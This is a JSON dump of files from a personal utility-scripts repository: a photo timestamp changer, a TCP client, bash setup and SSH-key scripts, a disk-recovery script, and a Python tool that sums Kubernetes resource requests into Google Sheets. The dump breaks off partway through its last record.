[ { "alpha_fraction": 0.5541666746139526, "alphanum_fraction": 0.5609375238418579, "avg_line_length": 29, "blob_id": "4fe2c8d8e127b078d1289823e9c7a2d096e76ec1", "content_id": "2bcaf403431992465e1f0f38fd2a41de7d94924d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1920, "license_type": "no_license", "max_line_length": 104, "num_lines": 64, "path": "/change-photos-timestamp/timestamp-changer.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport datetime\nimport sys\n\n\"\"\"\nChanges timestamp for all photos in directory.\nSorts photos by name and add's 1min interval for each.\n\"\"\"\n\nclass Timestamp():\n\n def __init__(self, day, month, year):\n self.year = year\n self.month = month\n self.day = day\n self.hour = datetime.datetime.now().hour\n self.minute = datetime.datetime.now().minute\n self.second = datetime.datetime.now().second\n\n def __repr__(self):\n return '{}-{}-{} {}:{}:{}'.format(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second)\n\n\nclass TimestampChanger():\n\n def get_sorted_photos_list(self, entries):\n photos = {}\n for entry in entries:\n if '.JPG' in entry.name:\n photos[int(entry.name.strip('.JPG'))] = entry\n else:\n pass\n return dict(sorted(photos.items())).values()\n\n def change_timestamp(self, dir_name, date):\n with os.scandir(dir_name) as entries:\n for entry in self.get_sorted_photos_list(entries):\n # Add 1 min to photo\n date = date + datetime.timedelta(seconds=60)\n self.modify_photo(entry, date)\n\n def modify_photo(self, entry, timestamp):\n modTime = time.mktime(timestamp.timetuple())\n os.utime(entry, (modTime, modTime))\n\ndef main(dir_name, date):\n # Example: modify_date.py photos/ 17-4-2018\n #todo Add %H:%M:%S\n timestamp = Timestamp(*date.split('-'))\n changer = TimestampChanger()\n print(\"=> Changing timestamp in {}\".format(dir_name))\n print(\"=> Timestamp: {}\".format(date))\n\n changer.change_timestamp(dir_name, datetime.datetime.strptime(repr(timestamp), '%Y-%m-%d %H:%M:%S'))\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n" }, { "alpha_fraction": 0.6707021594047546, "alphanum_fraction": 0.6888619661331177, "avg_line_length": 32.08000183105469, "blob_id": "101c902302190676ecde7487275f489b75bdec93", "content_id": "e06ae77ff8eed60086d8eb0cc18b5a2a1ea8de07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 958, "license_type": "no_license", "max_line_length": 128, "num_lines": 25, "path": "/tcp_server/tcp_server/echo_client.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import socket\n\n\"\"\"\nВторое приложение (клиент)\nОрганизовать отсылку команд серверу (сообщений и управляющих команд). Команды с параметрами вводятся пользователем с клавиатуры.\n\"\"\"\n\nHOST = '0.0.0.0' # The server's hostname or IP address\nPORT = 8080 # The port used by the server\n\nprint(\"input 'get_users' to get list of all users\")\ncommand = str(input('Input command:'))\ndata = \"{'send_to': 'user_1', 'command': '\"+command+\"'}\"\n\n# Create a socket (SOCK_STREAM means a TCP socket)\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n # Connect to server and send data\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data, \"utf-8\"))\n\n # Receive data from the server and shut down\n received = str(sock.recv(1024), \"utf-8\")\n\nprint(\"Sent: {}\".format(data))\nprint(\"Received: {}\".format(received))" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 22.214284896850586, "blob_id": "74a899212168e0f9aee1d0b15745db04d1d1c72d", "content_id": "b0a5e23005b0077364b624692376083e6a1bdfa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 325, "license_type": "no_license", "max_line_length": 81, "num_lines": 14, "path": "/bash/myenv/Vm-env/configs/.bashrc", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#aliases\nalias trc='tree -C'\nalias trp='tree -Cpu'\nalias trd='tree -C -d'\nalias clc='clear'\nalias vi='vim'\nalias ll='ls -l'\n\n# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.\nexport PATH=\"$PATH:$HOME/.rvm/bin\"\n\nexport PS1=\"\\$[\\[\\e[32m\\]\\h\\[\\e[m\\]]:[\\[\\e[31m\\]\\u\\[\\e[m\\]]:[\\W]: \"\n" }, { "alpha_fraction": 0.654618501663208, "alphanum_fraction": 0.6586345434188843, "avg_line_length": 16.785715103149414, "blob_id": "6d37d2bb2165992629c449ce9025b03fdbf4ae0b", "content_id": "883b5bf73e2339f83eb3259b0b425c62f387f9c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 249, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/bash/myenv/Vm-env/start.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"Starting prep-env script!\"\n\necho \"==> Configuring Vim\"\n. user-env/vim.sh\n\necho \"==> Starting bashrc config module\"\n. user-env/bash.sh\n\n#echo \"==> Generating ssh keys\"\n#{$1}/Vm-env/user-env/keys.sh\n\nsource ~/.bashrc\necho \"===> END\"\n" }, { "alpha_fraction": 0.591549277305603, "alphanum_fraction": 0.6003521084785461, "avg_line_length": 19.962963104248047, "blob_id": "b8d68915258298397aa5e718cb905e5aadef461f", "content_id": "eb608101a82670dde844e8112adaf75a6309b56b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 568, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/bash/recovery.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash \n\necho \"=> Searching for disk to recover\"\ndiskutil list\ndf -h\n\nread -p \"-> Select disk to recover: \" disk\necho \"Recovering disk: ${disk}\"\n\necho \"=> Unmounting ${disk}\"\ndiskutil unmountDisk ${disk}\n\necho \"=> Running diagnostics on ${disk}\"\nfdisk ${disk}\ndiskutil info ${disk}\n\nread -r -p \"-> Recover ${disk}? It will be formated. [y/N] \" response\n\ncase \"$response\" in\n [yY][eE][sS]|[yY]) \n\t\t\t\techo \"=> Recovering ${disk}\"\n diskutil partitiondisk ${disk} 1 MBRFormat \"HFS+\" \"flash\" 1024M\n ;;\n *)\n\t\t\t\techo \"=> Exiting\"\n ;;\nesac\n\n\n" }, { "alpha_fraction": 0.737922728061676, "alphanum_fraction": 0.7439613342285156, "avg_line_length": 47.764705657958984, "blob_id": "1cd795f1abab225b203d014c3c5d8f6b1f5b32b0", "content_id": "07b377a75315fad60a4bee85e4861529d1a28405", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 828, "license_type": "no_license", "max_line_length": 128, "num_lines": 17, "path": "/google_sheets_parcer/README.md", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "****\n#### Script resources_parser.py executes following steps:\n\n\n1. Downloads git@github.com:amaslakou/saas-app-deployment.git.\n2. Parse files from to_check_folders value (list of folders), and gets metrics from all selected folders, and imports it to CSV.\n3. Updates Google Sheet with metrics for all environments.\n\n#### Requirements:\n- python 3.7\n- imported libs\n- access to git@github.com:*maslakou/saas******.git (~/.ssh keys configured)\n- client_secrets_service_account.json file.\n - Register in Google Cloud Platform and create project.\n - Create service account in GCP.(Place it in same folder as script, and rename as client_secrets_service_account.json)\n - Add API's in API's & Services tab in GCP - Google sheets API, Google Drive API\n - Create Google Spreadsheet, and add write access to created service account." }, { "alpha_fraction": 0.6338329911231995, "alphanum_fraction": 0.6423982977867126, "avg_line_length": 34.846153259277344, "blob_id": "175b9d0135b5eb7362dbcd0e3406c38be559ae2f", "content_id": "9e89aa29ca973851e5ff4ed3d525164e017d25b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 467, "license_type": "no_license", "max_line_length": 69, "num_lines": 13, "path": "/bash/myenv/start-remotely.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread -p \"Enter server and user (example: root@ecsc00a00a46.epam.com): \" server\nread -p \"Specify custom port? (default: 22):\" port\nread -p \"Enter path of downloading (/tmp/): \" path\necho \"Path : ${path:=/tmp}\"\necho \"Port : ${port:=22}\"\necho \"Copying Vm-env files in ${path} on ${server}\" \n\nscp -r -P ${port} ~/Workspace/Scripts/myenv/Vm-env ${server}:${path}/\n\necho \"Executing script on remoute server: ${server}\"\nssh ${server} -p ${port} \"$path/Vm-env/start.sh ${path}\"\n\n" }, { "alpha_fraction": 0.7764350175857544, "alphanum_fraction": 0.7854984998703003, "avg_line_length": 65.4000015258789, "blob_id": "bec992b8564c23b527299e4ba2301f2ce1ff5f47", "content_id": "87ec951bd88d08038df9bb77e52e51b9760c397f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 229, "num_lines": 5, "path": "/EC2_parcer/README.md", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "Updates [config-cluster.yaml](https://github.com/Infoblox-CTO/csp.host-app.service/blob/develop/deploy/vanilla_v2/QA0/config-cluster.yaml) with relevant Public IP for Jumphosts and Internal IP for core nodes on hostapp clusters \n\nRequirements:\n - AWS cli installed and configured (and your account has access to ec2)\n - pipenv" }, { "alpha_fraction": 0.6362007260322571, "alphanum_fraction": 0.643369197845459, "avg_line_length": 20.461538314819336, "blob_id": "7486af90df195d1a6fa0479045a46eaa3ba1001c", "content_id": "930a0b665e82b8422a71ec6195c138dfc41b5001", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 558, "license_type": "no_license", "max_line_length": 64, "num_lines": 26, "path": "/bash/add-ssh-key.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread -p \"Enter path of key (/Users/dart/.ssh/id_rsa.pub): \" KEY\necho \"Path : ${KEY:=/Users/dart/.ssh/id_rsa.pub}\"\n\nif [ -f $KEY ]; then\n\t\techo \"id_rsa.pub exists!\"\nelse\n\techo \"Can't find key, generating new key!\"\n\tssh-keygen -t rsa\n\tif [-f $KEY]; then\n\t\techo \"Key generated!\"\n\telse\n\t\techo \"Keys not generated, error!\"\n\t\texit\n\tfi\nfi\n\nread -p \"Enter server and user (example: root@ecsc00a00a46.epam.com): \" server\necho \"serv: ${server}\"\n\n#read -p \"Enter server port (example: 22): \" serverport\n#echo \"Path : ${serverport:=22}\"\n\nssh-copy-id $server \n#-p $serverport\n" }, { "alpha_fraction": 0.5361188054084778, "alphanum_fraction": 0.5408298969268799, "avg_line_length": 33.90863800048828, "blob_id": "2152f4199267a9fb5429fc0096b063aac89603e3", "content_id": "fe1178aaf3a163fe08739f70bb3e74313fc6ef55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21014, "license_type": "no_license", "max_line_length": 151, "num_lines": 602, "path": "/google_sheets_parcer/resources_parser.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import os\nimport git\nimport yaml\nimport csv\nimport re\nimport time\nimport gspread\nfrom pydrive.auth import ServiceAccountCredentials\n# import pdb; pdb.set_trace()\n\n\nclass Env:\n\n def __init__(self, name):\n self.name = name\n self.projects = []\n self.sum_metrics = None\n\n def get_project(self, name):\n for prj in self.projects:\n if prj.name == name:\n return prj\n prj = Project(name)\n self.projects.append(prj)\n return prj\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 0\n\n for prj in self.projects:\n sum_min_CPU += prj.sum_metrics.min_CPU\n sum_max_CPU += prj.sum_metrics.max_CPU\n sum_min_MEM += prj.sum_metrics.min_MEM\n sum_max_MEM += prj.sum_metrics.max_MEM\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n for prj in self.projects:\n int_sum_min_CPU += prj.sum_metrics_int.min_CPU\n int_sum_max_CPU += prj.sum_metrics_int.max_CPU\n int_sum_min_MEM += prj.sum_metrics_int.min_MEM\n int_sum_max_MEM += prj.sum_metrics_int.max_MEM\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"Env: {0}\\n Projects: {1}\".format(self.name, self.projects)\n\n\nclass Project:\n\n def __init__(self, name):\n self.name = name\n self.services = []\n self.sum_metrics = None\n\n def get_service(self, name):\n for srv in self.services:\n if srv.name == name:\n return srv\n srv = Service(name)\n self.services.append(srv)\n return srv\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 0\n\n for srv in self.services:\n sum_min_CPU += srv.sum_metrics.min_CPU\n sum_max_CPU += srv.sum_metrics.max_CPU\n sum_min_MEM += srv.sum_metrics.min_MEM\n sum_max_MEM += srv.sum_metrics.max_MEM\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n for srv in self.services:\n int_sum_min_CPU += srv.sum_metrics_int.min_CPU\n int_sum_max_CPU += srv.sum_metrics_int.max_CPU\n int_sum_min_MEM += srv.sum_metrics_int.min_MEM\n int_sum_max_MEM += srv.sum_metrics_int.max_MEM\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"\\nProject: {0}\\nServices: {1}\".format(self.name, self.services)\n\n\nclass Service:\n\n def __init__(self, name):\n self.name = name\n self.pods = []\n self.sum_metrics = None\n self.sum_metrics_int = None\n\n def get_pod(self, name):\n for pod in self.pods:\n if pod.name == name:\n return pod\n pod = Pod(name)\n self.pods.append(pod)\n return pod\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 0\n\n for pod in self.pods:\n sum_min_CPU += pod.sum_metrics.min_CPU\n sum_max_CPU += pod.sum_metrics.max_CPU\n sum_min_MEM += pod.sum_metrics.min_MEM\n sum_max_MEM += pod.sum_metrics.max_MEM\n\n for pod in self.pods:\n int_sum_min_CPU += pod.sum_metrics.min_CPU / pod.replicas\n int_sum_max_CPU += pod.sum_metrics.max_CPU / pod.replicas\n int_sum_min_MEM += pod.sum_metrics.min_MEM / pod.replicas\n int_sum_max_MEM += pod.sum_metrics.max_MEM / pod.replicas\n\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"\\nService: {0}\\nPods: {1}\".format(self.name, self.pods)\n\n\nclass Pod:\n\n def __init__(self, name):\n self.name = name\n self.containers = []\n self.replicas = None\n self.sum_metrics = None\n\n def add_container(self, cnt):\n # for cnt in self.containers:\n # if cnt.name == name:\n # return cnt\n self.containers.append(cnt)\n return cnt\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n for cnt in self.containers:\n sum_min_CPU += self.none_checker(cnt.metrics.min_CPU) * self.replicas\n sum_max_CPU += self.none_checker(cnt.metrics.max_CPU) * self.replicas\n sum_min_MEM += self.none_checker(cnt.metrics.min_MEM) * self.replicas\n sum_max_MEM += self.none_checker(cnt.metrics.max_MEM) * self.replicas\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n @staticmethod\n def none_checker(mtr):\n if mtr is None:\n return 0\n else:\n return mtr\n\n def __repr__(self):\n return \"\\nPod: {0} |Replicas: {2}\\nContainers: {1}\".format(self.name, self.containers, self.replicas)\n\n\nclass Container:\n\n def __init__(self, name, metrics):\n self.name = name\n self.metrics = metrics\n\n def __repr__(self):\n return \"\\nContainer: {0}\\n \\tMetrics: {1}\".format(self.name, self.metrics)\n\n\nclass Metrics:\n\n def __init__(self):\n self.min_CPU = None\n self.max_CPU = None\n self.min_MEM = None\n self.max_MEM = None\n\n def __repr__(self):\n return \"\\n\\t\\tmin_CPU: {0} \\n\\t\\tmax_CPU: {1} \\n\\t\\tmin_MEM: {2} \\n\\t\\tmax_MEM: {3}\".format(self.min_CPU, self.max_CPU,\n self.min_MEM, self.max_MEM)\n\n\nclass Calculator:\n\n def __init__(self, min_CPU, max_CPU, min_MEM, max_MEM):\n self.min_CPU = min_CPU\n self.max_CPU = max_CPU\n self.min_MEM = min_MEM\n self.max_MEM = max_MEM\n\n\nclass Summarizer:\n\n def __init__(self, envs):\n self.envs = envs\n\n def sum(self):\n for env in self.envs:\n for prj in env.projects:\n for srv in prj.services:\n for pod in srv.pods:\n pod.calc()\n srv.calc()\n prj.calc()\n env.calc()\n\n\nclass Repository:\n\n def __init__(self, git_url):\n\n self.local_path = os.getcwd() + '/repo'\n self.git_url = git_url\n\n print(\"Cloning repo in {0}\".format(self.local_path))\n\n try:\n git.Repo.clone_from(self.git_url, self.local_path)\n except git.exc.GitCommandError as err:\n print(err)\n\n self.repo = git.Repo(self.local_path)\n\n print(\"Active branch: {0}\".format(self.repo.active_branch))\n print(\"- : {0}\".format(self.repo))\n\n\nclass Parser:\n \"\"\"\n :param repo, folders\n :returns nested dict with metrics\n \"\"\"\n\n def __init__(self, repo, to_check_folders, envs):\n self.repo_path = repo # Local system path to repository\n self.required_files_path = [] # Array with all files from folders to check\n self.to_check_folders = to_check_folders\n self.envs = envs\n # todo git webhooks after commit\n\n def searcher(self, path):\n \"\"\"\n function recursivelly searches all files from the given file path\n\n :param path: folder path\n :return: all files full path, from given folder\n \"\"\"\n\n for file in os.listdir(path):\n file_path = str(path + '/' + file)\n\n if os.path.isdir(file_path):\n self.searcher(file_path)\n else:\n self.required_files_path.append(file_path)\n\n return self.required_files_path\n\n def search_required_folders(self, folders):\n \"\"\"\n :param folders: folders required to check\n :return: all files full paths\n \"\"\"\n\n for folder in folders:\n folder = self.repo_path + \"/\" + folder\n try:\n for file in os.listdir(folder):\n file_path = str(folder + '/' + file)\n if os.path.isdir(file_path):\n self.searcher(file_path)\n else:\n self.required_files_path.append(file_path)\n except FileNotFoundError as err:\n print(\"Directory not found: {0}\".format(err))\n return self.required_files_path\n\n def parse(self):\n\n required_files = self.search_required_folders(self.to_check_folders)\n self.fill_the_structure(required_files) # Getting files from to_check_folders to parse\n\n def fill_the_structure(self, files):\n \"\"\"\n :param files to parse\n :return: list of dicts for each env\n \"\"\"\n files_parsed = 0\n files_failed_to_parse = 0\n for file in files:\n data = self.check_file_kind(file)\n if data:\n print(\"Checking file: {0}\".format(file))\n # print(\"Data: {0}\".format(data))\n self.parse_yaml(file, data)\n files_parsed+=1\n print(\"Files parsed: {0}\".format(files_parsed))\n return self.envs\n\n def check_file_kind(self, file):\n if file.lower().endswith('.yaml'):\n with open(file, 'r') as stream:\n try:\n for data in yaml.load_all(stream):\n if data:\n if data.get('kind', None) == 'Deployment':\n return data\n else:\n return False\n except AttributeError as err:\n print(\"=> Error parsing yaml file: {0} \\n Error: {1}\".format(file, err))\n return False\n\n except yaml.YAMLError as err:\n print(\"=> Error parsing yaml file: {0} \\n Error: {1}\".format(file, err))\n return False\n else:\n return False\n\n def get_env(self, name):\n for env in self.envs:\n if env.name == name:\n return env\n env = Env(name)\n self.envs.append(env)\n return env\n\n def parse_yaml(self, file, data):\n env = self.get_env(file.split('/')[-2])\n # prj = env.get_project(file[(file.index('/deployment/') + len('/deployment/')):file.index(\"/\" + env.name)])\n prj = env.get_project(file.split('/')[file.split('/').index('deployment') + 1])\n\n if data.get('metadata', {}).get('name', None):\n srv = prj.get_service(data['metadata']['name'])\n pod_replicas = data.get('spec', {}).get('replicas', None)\n if data.get('spec', {}).get('template', {}).get('metadata', {}).get('labels', {}).get('app', None):\n pod = srv.get_pod(data['spec']['template']['metadata']['labels']['app'])\n pod.replicas = pod_replicas\n else:\n pod = srv.get_pod(srv.name)\n pod.replicas = pod_replicas\n if data.get('spec', {}).get('template', {}).get('spec', {}).get('containers', None):\n for container in data['spec']['template']['spec']['containers']:\n metrics = Metrics()\n if container.get('resources', None):\n if container['resources'].get('requests', None):\n metrics.min_CPU = container['resources']['requests'].get('cpu', 0)\n metrics.min_MEM = container['resources']['requests'].get('memory', 0)\n if container['resources'].get('limits', None):\n metrics.max_CPU = container['resources']['limits'].get('cpu', 0)\n metrics.max_MEM = container['resources']['limits'].get('memory', 0)\n\n metrics.min_CPU = self.metric_recalculation(metrics.min_CPU)\n metrics.max_CPU = self.metric_recalculation(metrics.max_CPU)\n metrics.max_MEM = self.metric_recalculation(metrics.max_MEM)\n metrics.min_MEM = self.metric_recalculation(metrics.min_MEM)\n\n cnt = Container(container.get('name', None), metrics)\n pod.add_container(cnt)\n\n def metric_recalculation(self, metric):\n if type(metric) is int:\n return metric\n if type(metric) is str:\n if 'm' in metric:\n return int(re.findall('\\d+', str(metric))[0]) / 1000\n elif 'Gi' in metric:\n return int(re.findall('\\d+', str(metric))[0]) * 1000\n elif 'Mi' in metric:\n return int(re.findall('\\d+', str(metric))[0])\n if type(metric) is None:\n return int(0)\n\n\nclass Printer:\n\n def __init__(self, envs):\n self.envs = envs\n\n def print(self):\n for env in envs:\n print(\"Env: \" + env.name)\n for prj in env.projects:\n print(\"- Project: \" + prj.name)\n for srv in prj.services:\n print(\" - Service: \" + srv.name)\n for pod in srv.pods:\n print(\" - Pod: \" + pod.name)\n print(\" Replicas: {0}\".format(pod.replicas))\n for cnt in pod.containers:\n print(\" - Container: {0}\".format(cnt.name))\n print(\" {0}\".format(cnt.metrics))\n\n\nclass CSVPrinter(Printer):\n\n def __init__(self, envs):\n self.headers = [\"Project\", \"Service\", \"Pod\", \"Summary\", \"Replicas\", \"Container\", \"min_CPU\", \"max_CPU\",\n \"min_MEM\", \"max_MEM\"]\n super(CSVPrinter, self).__init__(envs)\n\n def write_row(self, *arg):\n self.csv_env.append([*arg])\n\n def print_to_files(self):\n\n csv_files_dir = os.getcwd() + '/envs/'\n print(\"Printing to files to {0}\".format(csv_files_dir))\n if not os.path.exists(csv_files_dir):\n os.makedirs(csv_files_dir)\n\n files = []\n env_names = []\n for env in self.envs:\n with open(csv_files_dir + env.name, \"w\") as file:\n writer = csv.DictWriter(file, self.headers)\n writer.writeheader()\n for row in self.print_env(env):\n writer.writerow(dict(zip(self.headers, row)))\n files.append(csv_files_dir + env.name)\n env_names.append(env.name)\n return env_names, files\n\n def print_env(self, env):\n self.csv_env = []\n for prj in env.projects:\n for srv in prj.services:\n for pod in srv.pods:\n for cnt in pod.containers:\n self.write_row(prj.name, srv.name, pod.name, None, None, cnt.name,\n cnt.metrics.min_CPU, cnt.metrics.max_CPU, cnt.metrics.min_MEM, cnt.metrics.max_MEM)\n\n self.write_row(prj.name, srv.name, pod.name, \"by pod\", pod.replicas, None,\n pod.sum_metrics.min_CPU, pod.sum_metrics.max_CPU, pod.sum_metrics.min_MEM, pod.sum_metrics.max_MEM)\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n\n self.write_row(prj.name, srv.name, None, \"by service\", None, None,\n srv.sum_metrics.min_CPU, srv.sum_metrics.max_CPU, srv.sum_metrics.min_MEM, srv.sum_metrics.max_MEM)\n self.write_row(prj.name, srv.name, None, \"by service(integration)\", None, None,\n srv.sum_metrics_int.min_CPU, srv.sum_metrics_int.max_CPU, srv.sum_metrics_int.min_MEM, srv.sum_metrics_int.max_MEM)\n\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n self.write_row(prj.name, None, None, \"by project\", None, None,\n prj.sum_metrics.min_CPU, prj.sum_metrics.max_CPU, prj.sum_metrics.min_MEM, prj.sum_metrics.max_MEM)\n self.write_row(prj.name, None, None, \"by project(integration)\", None, None,\n prj.sum_metrics_int.min_CPU, prj.sum_metrics_int.max_CPU, prj.sum_metrics_int.min_MEM, prj.sum_metrics_int.max_MEM)\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n self.write_row(None, None, None, \"Total\", None, None,\n env.sum_metrics.min_CPU, env.sum_metrics.max_CPU, env.sum_metrics.min_MEM, env.sum_metrics.max_MEM)\n self.write_row(None, None, None, \"Total(integration)\", None, None,\n env.sum_metrics_int.min_CPU, env.sum_metrics_int.max_CPU, env.sum_metrics_int.min_MEM, env.sum_metrics_int.max_MEM)\n\n return self.csv_env\n\n def print(self):\n for env in envs:\n return env.name, self.print_env(env)\n\n def print_by_env(self, env):\n return env.name, self.print_env(env)\n\n\nclass CSVImporter:\n def __init__(self, credentials):\n\n scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']\n self.credentials = ServiceAccountCredentials.from_json_keyfile_name(credentials, scope)\n self.gc = gspread.authorize(self.credentials)\n\n def create_sheet(self, sh_name, mail):\n \n self.sh = self.gc.create(sh_name)\n self.sh.share('mail', perm_type='user', role='writer')\n return self.sh\n\n def calculate_env_size(self, metrics):\n rows = len(metrics)\n cols = len(metrics[0])\n print(\"rows: {0} \\ncolumns: {1}\".format(rows, cols))\n return rows, cols\n\n def import_env(self, sheet_key, env_name, metrics, mail):\n\n print(\"Updating env: {0}\".format(env_name))\n\n try:\n sheet = self.gc.open_by_key(sheet_key)\n print(\"Opening sheet: {0}\".format(sheet.title))\n except Exception:\n print(\"Creating new sheet: {0}\".format(sheet.title))\n sheet = self.create_sheet(sheet_key, mail)\n\n rows, cols = self.calculate_env_size(metrics)\n\n try:\n sheet.del_worksheet(sheet.worksheet(env_name))\n except gspread.exceptions.WorksheetNotFound:\n print(\"Creating new worksheet: {0}\".format(env_name))\n\n wsh = sheet.add_worksheet(title=env_name, rows=rows, cols=cols)\n\n self.update_by_cell(wsh, metrics)\n\n def update_by_cell(self, wsh, metrics):\n\n if self.credentials.access_token_expired:\n print(\"Refreshing token\")\n self.gc.login()\n\n for row_i, row in enumerate(metrics):\n print(row_i, row)\n for col_i, cell in enumerate(row):\n print(row_i + 1, col_i + 1, cell)\n wsh.update_cell(row_i + 1, col_i + 1, cell)\n time.sleep(1)\n\n def update_wsh(self, wsh, metrics):\n\n cell_list = []\n for row_i, row in enumerate(metrics):\n for col_i, value in enumerate(row):\n print(row_i + 1, col_i + 1, value)\n cellToUpdate = wsh.cell(row_i + 1, col_i + 1)\n cellToUpdate.value = value\n cell_list.append(cellToUpdate)\n\n # print(\"cell_list:\")\n # print(cell_list)\n wsh.update_cells(cell_list)\n\n\nif __name__ == '__main__':\n\n # todo argparse\n\n # Execution parameters\n repo_url = 'git@github.com:amaslakou/saas-app-deployment.git'\n to_check_folders = [\"folder1\", \"folder2\", \"folder3\"]\n google_sheet_key = '1b34X*****************'\n credentials_importer = os.getcwd() + '/service_account.json'\n mail = 'YOUR_MAIL_ADDR@gmail.com'\n\n # Downloading repository\n repo = Repository(repo_url)\n repository = repo.local_path\n\n # Parse required folders, create envs structure\n envs = []\n parser = Parser(repo.local_path, to_check_folders, envs)\n parser.parse()\n\n if not envs:\n print(\"No metrics found\")\n exit()\n else:\n printer = Printer(envs)\n printer.print()\n\n # Add sum values in envs structure\n summarizer = Summarizer(envs)\n summarizer.sum()\n\n csv_printer = CSVPrinter(envs)\n\n # Prints CSV to local files\n csv_printer.print_to_files()\n\n # Authenticate in Google\n print(credentials_importer)\n\n # Writing envs to Google Sheets\n for env in envs:\n env_name, env_metrics = csv_printer.print_by_env(env)\n csv_importer = CSVImporter(credentials_importer)\n csv_importer.import_env(google_sheet_key, env_name, env_metrics, mail)" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7255814075469971, "avg_line_length": 20.299999237060547, "blob_id": "9907b9a698eb30be5e4ab637f1aeda32ed5ccb7d", "content_id": "776e86f22b79ec211dfd7a7e2e75b0be74361403", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 215, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/tcp_server/Dockerfile", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "FROM python:3\n\nWORKDIR /Users/dart/Workspace/Virtualization/Docker/Python/tcp_server\n\nCOPY requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\n\nCOPY . .\n\nCMD [ \"python\", \"./new_TCP_server.py\" ]\n\n\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 13.75, "blob_id": "86cd90843fd7ee791258fd2ece2e15e1101fa73a", "content_id": "86d3b585482c1c4377790c5530a585637694f442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/bash/myenv/Vm-env/test.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"Dirname check: $PWD\"\n. user-env/echo.sh \n" }, { "alpha_fraction": 0.5316159129142761, "alphanum_fraction": 0.5403448939323425, "avg_line_length": 34.05223846435547, "blob_id": "fdca3ce3165b6bce1a91cb33e035c480035ccb18", "content_id": "adfa93c84537384fd14883bbbeec60cb0856c23b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4697, "license_type": "no_license", "max_line_length": 87, "num_lines": 